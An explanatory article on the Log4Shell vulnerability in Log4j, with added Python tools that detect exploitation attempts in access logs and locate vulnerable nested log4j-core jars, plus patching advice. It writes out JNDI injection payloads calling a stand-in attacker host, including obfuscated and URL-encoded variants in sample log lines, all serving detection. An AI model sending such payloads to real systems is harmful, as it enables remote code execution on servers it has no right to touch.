A critical vulnerability, tracked as CVE-2021-44228, was disclosed in Log4j, a widely used Java logging library. December 2021 saw IT and security teams scramble to identify affected systems and apply patches or workarounds as vendors drip-fed them.
The vulnerability, dubbed Log4Shell, is trivially easy to exploit and allows attackers to execute code on servers remotely. An attacker only needs to get a string such as ${jndi:ldap://attacker.example/x} into something the application logs (a User-Agent header, a username, a search term), and a vulnerable Log4j will resolve the JNDI lookup, fetch a payload from the attacker's server and execute it. This, coupled with the fact that Log4j is pulled into a very large share of Java applications, often as a transitive dependency the developers never chose directly, makes remediation particularly difficult.
Security experts say state-backed Chinese and Iranian hackers and rogue cryptocurrency miners have already started exploiting it.
What is Log4j?
Log4j is a library that Java applications use to record events, such as errors and routine operations, for later use by system administrators and developers. It is an extremely popular open-source project of the Apache Software Foundation, developed and maintained by volunteers. Because it is a Java library it runs wherever Java does (Windows, macOS, Linux, network appliances, embedded devices), and simply finding the systems that use it is a challenge: it is usually buried inside other software, bundled as a dependency of a dependency or nested inside a vendor's application archive.
Here is an example of how Log4j is used: when you type something into a text box, follow a link or click a button, the web server behind it typically records that request in a log using Log4j, including data you supplied such as the URL, your browser's User-Agent string or the text you entered. Events are captured for several reasons, including troubleshooting, data analysis and statistics. That is exactly what makes Log4Shell so dangerous: the text being logged is under the attacker's control.
Because Log4j is both open source and free, the library has found its way into a vast range of software, from enterprise Java servers to consumer devices, and indirectly touches much of the internet.
The threat is real
Check Point reported observing over 800,000 attack attempts within 72 hours of the vulnerability being made public, and described it as clearly one of the most serious vulnerabilities on the internet in recent years, with a potential for damage that is incalculable.
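Most of those attack attempts are visible in ordinary web access logs, because the payload has to arrive in a logged field such as the User-Agent or the query string. The following is an added example, not code from the original article: it URL-decodes each log line and undoes the most common obfuscations scanners used (the ${lower:x}/${upper:x} case lookups and the ${anything:-value} default trick) before looking for a JNDI lookup. The log lines and the hostname attacker.example are constructed for the example; real scanning traffic uses further tricks (${date:...}, hex escapes, and so on) that this does not cover.

```python
"""Flag Log4Shell exploitation attempts in web access logs (added example)."""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (synthetic, not real traffic).
# Line 4 uses nested lookups and line 5 is URL-encoded, both common in the wild.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.8 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${jndi:rmi://attacker.example/a} HTTP/1.1" 200 512 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/a}"
10.0.0.10 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "-"
"""

# ${lower:x} / ${upper:x} with no further nesting inside
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
# ${anything:-value} resolves to "value" when the lookup fails; ${::-l} -> l
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# what we are really looking for once the noise is stripped
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)


def _apply_case(m):
    text = m.group(2)
    return text.lower() if m.group(1).lower() == "lower" else text.upper()


def normalize(text, rounds=10):
    """Decode and simplify until the string stops changing (bounded so a
    crafted input cannot make us loop forever)."""
    for _ in range(rounds):
        prev = text
        text = unquote(text)
        text = _CASE.sub(_apply_case, text)
        text = _DEFAULT.sub(r"\1", text)
        if text == prev:
            break
    return text


def find_log4shell_attempts(log_text):
    """Return (line number, client IP, JNDI scheme) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((lineno, line.split()[0], m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for lineno, ip, scheme in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {lineno}: {ip} sent a jndi:{scheme} lookup")
```

Run it over a real access log with find_log4shell_attempts(open(path).read()); a hit tells you who probed you, not whether the probe succeeded, so follow up with outbound LDAP/RMI connection logs from the affected host.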
Large organisations could easily have hundreds of vulnerable applications across thousands of devices that all need patches or fixes applied and thorough testing carried out. Systems and services using Log4j 2 from version 2.0 (the 2.0 beta releases included) up to and including 2.15.0 are affected by the remote code execution vulnerability, CVE-2021-44228; 2.15.0 is included because its fix turned out to be incomplete, tracked separately as CVE-2021-45046. Those running Log4j 2 between versions 2.0 and 2.16.0 inclusive are affected by a later-discovered denial-of-service vulnerability, CVE-2021-45105. Log4j 1.x is not affected by these issues, but it has been end of life since 2015 and has unrelated problems of its own, so it is not a safe fallback.
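Finding every copy is the hard part, since log4j-core is frequently nested inside a fat jar, war or ear rather than sitting in a directory of its own. The following scanner is an added example, not the Log4j project's own tooling: it walks a directory, opens every archive in memory, recurses into nested archives, reads the version from the pom.properties that log4j-core ships, and checks whether JndiLookup.class is still present, since removing that class is the mitigation Apache recommends. The version ranges are the ones given above; the Java 6/7 backport releases (2.3.1 and later, 2.12.2 and later) are reported for manual review rather than classified, and the synthetic fat jar built at the bottom is constructed test input, not a real artifact.

```python
"""Locate log4j-core jars, including nested ones, and classify them (added example)."""
import io
import os
import re
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MAX_DEPTH = 5  # assumption: archives rarely nest deeper than this


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are
    dropped, so the 2.0 betas sort with 2.0 and stay inside the affected range."""
    nums = [int(n) for n in re.findall(r"\d+", version.split("-")[0])]
    return tuple((nums + [0, 0, 0])[:3])


def classify(version, jndi_lookup_present):
    """Findings for a log4j-core version, main 2.x line only. The Java 6/7
    backport releases (2.3.1+, 2.12.2+) are left for manual review."""
    v = parse_version(version)
    if v[0] != 2:
        return ["not log4j-core 2.x (1.x is end of life; outside these CVEs)"]
    if (v[:2] == (2, 12) and v[2] >= 2) or (v[:2] == (2, 3) and v[2] >= 1):
        return ["backport release (2.3.x/2.12.x): check its release notes"]
    findings = []
    # 2.15.0 is included: its fix was incomplete (CVE-2021-45046).
    if v <= (2, 15, 0):
        if jndi_lookup_present:
            findings.append("CVE-2021-44228 (JNDI RCE)")
        else:
            findings.append("CVE-2021-44228 mitigated: JndiLookup.class removed")
    if v <= (2, 16, 0):
        findings.append("CVE-2021-45105 (DoS)")
    return findings or ["not affected by CVE-2021-44228/CVE-2021-45105"]


def scan_archive(data, label, depth=0):
    """Yield (label, version, jndi_present) for each log4j-core found in an
    in-memory archive, descending into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = zf.namelist()
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        if m:
            yield label, m.group(1).strip(), JNDI_LOOKUP in names
    if depth < MAX_DEPTH:
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                yield from scan_archive(zf.read(name), f"{label}!{name}", depth + 1)


def scan_tree(root):
    """Walk a directory and return [(label, version, findings), ...]."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    data = fh.read()
                for label, ver, jndi in scan_archive(data, path):
                    results.append((label, ver, classify(ver, jndi)))
    return results


def build_sample_fat_jar():
    """Constructed test input: a synthetic fat jar nesting a fake log4j-core
    2.14.1 (JndiLookup present) and a fake 2.17.1 (absent). The class entry
    holds placeholder bytes, not real bytecode."""
    def fake_core(version, with_jndi):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
        return buf.getvalue()

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", fake_core("2.14.1", True))
        z.writestr("BOOT-INF/lib/log4j-core-2.17.1.jar", fake_core("2.17.1", False))
    return buf.getvalue()


if __name__ == "__main__":
    for label, ver, jndi in scan_archive(build_sample_fat_jar(), "app.jar"):
        print(label, ver, classify(ver, jndi))
```

On a real host run scan_tree("/opt") or similar; the "!" in each label shows the nesting path, which is what you need to hand to the vendor or build team, because a nested copy cannot be patched by replacing a file on disk.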
Change Freeze Complication
An added complication for the remediation effort is that many organisations apply a "change freeze" to production systems over the December/January period, meaning no changes or updates may be applied. This helps to maintain stability at a time when support staff are unavailable. An exception should be made to fix this vulnerability, especially on internet-facing systems: a change freeze protects against self-inflicted outages, not against an attacker who can already reach the server.
Because of the difficulty of finding and patching every affected copy, this vulnerability may be with us for months, even years. Heed the warning from security experts and make sure all of your software is up to date. Upgrade Log4j to the latest release: at the time of writing that is 2.17.1, which fixes both vulnerabilities (2.17.1 also addresses a further, lower-severity issue in the JDBC appender, CVE-2021-44832). Where an upgrade is not immediately possible, the mitigation recommended by Apache is to remove the JndiLookup class from the log4j-core jar, for example with zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class; the earlier advice to set log4j2.formatMsgNoLookups=true was later found to be insufficient and should not be relied on. For Log4j embedded in third-party products, only the vendor can ship the fix, so track vendor advisories as closely as your own code.